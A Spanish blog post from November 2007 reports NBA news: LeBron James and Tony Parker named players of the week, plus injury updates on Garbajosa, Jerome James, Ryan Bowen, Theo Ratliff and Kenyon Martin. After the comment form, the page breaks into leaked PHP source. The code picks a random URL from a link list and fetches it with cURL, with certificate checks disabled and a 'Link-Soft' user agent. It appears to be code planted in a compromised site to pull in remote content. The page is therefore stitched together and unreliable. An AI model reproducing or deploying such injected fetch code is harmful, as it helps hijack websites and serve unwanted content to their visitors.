Noticias NBA (27/11/07)

27 de November de 2007 por Gallis

El nombramiento de Lebron James y Tony Parker como jugadores de la semana marca la actualidad de la NBA, que, por otro lado, trae malas noticias para los aficionados españoles.

El alero de los Cleveland Cavaliers LeBron James y el base francés de los San Antonio Spurs Tony Parker ha sido designados como jugadores de la semana en la NBA. LeBron James, mejor jugador del Este, ha liderado a los Cavs a un balance de 3-1 en los últimos siete días, con unos escalofriantes promedios de 36.5 puntos, 9.5 rebotes y 8.5 asistencias. Además, James se ha convertido en el primer jugador desde Bob Sura en realizar dos triples dobles en noches consecutivas. Por su parte, Tony Parker, mejor jugador de la Conferencia Oeste, ha liderado a los actuales campeones a un perfecto 4-0 en la última semana consiguiendo unos promedios de 26.5 puntos, 8.3 asistencias y 3 rebotes. Además, durante estos últimos siete días el último MVP de las Finales alcanzó su mejor anotación de la temporada, los 32 que le hizo a Orlando, e igualó su mejor marca de asistencias en lo que va de campaña con las 9 que dio ante Atlanta y Orlando.

Más noticias de la NBA…

Jorge Garbajosa deberá pasar finalmente por el quirófano para tratar de recuperarse de la lesión de tobillo en su pierna izquierda. Así lo ha confirmado Toronto Raptors en su página oficial. Esta decisión se ha tomado tras los análisis del equipo médico de la franquicia canadiense y de un experto de Baltimore consultado por el jugador. De momento no hay fecha para la operación ni se sabe cuánto tiempo estará Garbajosa fuera de la canchas. Lo que tampoco se conoce es la prima que tendrá que pagar Mutua Madrileña, ya que el seguro para que Garbajosa jugara el Eurobasket expira el próximo sábado 1 de diciembre.

Otro que podría perderse gran parte de la temporada es Jerome James. El jugador de los Knicks ha sido operado de su pie izquierdo y los médicos del equipo neoyorquino no han determinado un plazo para su regreso a las canchas.

Más lesiones: Ryan Bowen, jugador de New Orleans Hornets, se va a perder las 3 próximas semanas tras sufrir un esguince en la rodilla de su pierna izquierda. Bowen sufrió dicha lesión en el partido que enfrentó el viernes a los Hornets y a los Jazz, con victoria de estos últimos por 99-71.

Otro que podría estar un tiempo alejado de las canchas es Theo Ratliff. El pívot de Minnesotta ha declarado que se va a someter a un artroscopia en su pie izquierdo a finales de semana. Ratliff se ha perdido los 4 últimos partidos por molestias en su pie y con estas pruebas, pretende averiguar la gravedad de su lesión.

Mejores noticias han recibido Kenyon Martin y su equipo, los Denver Nuggets. Finalmente sus molestias en la rodilla izquierda no han ido más allá y el jugador podrá reaparecer en los próximos días, al estar considerado day to day. Así al menos se desprende de las pruebas a las que se ha sometido el jugador estos últimos días. Había una gran preocupación en la franquicia de Colorado, ya que Martin es un jugador con un gran historial de lesiones. Sin ir más lejos, el año pasado se perdió 80 partidos, es decir, toda la temporada, por una microfractura en esa misma rodilla.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>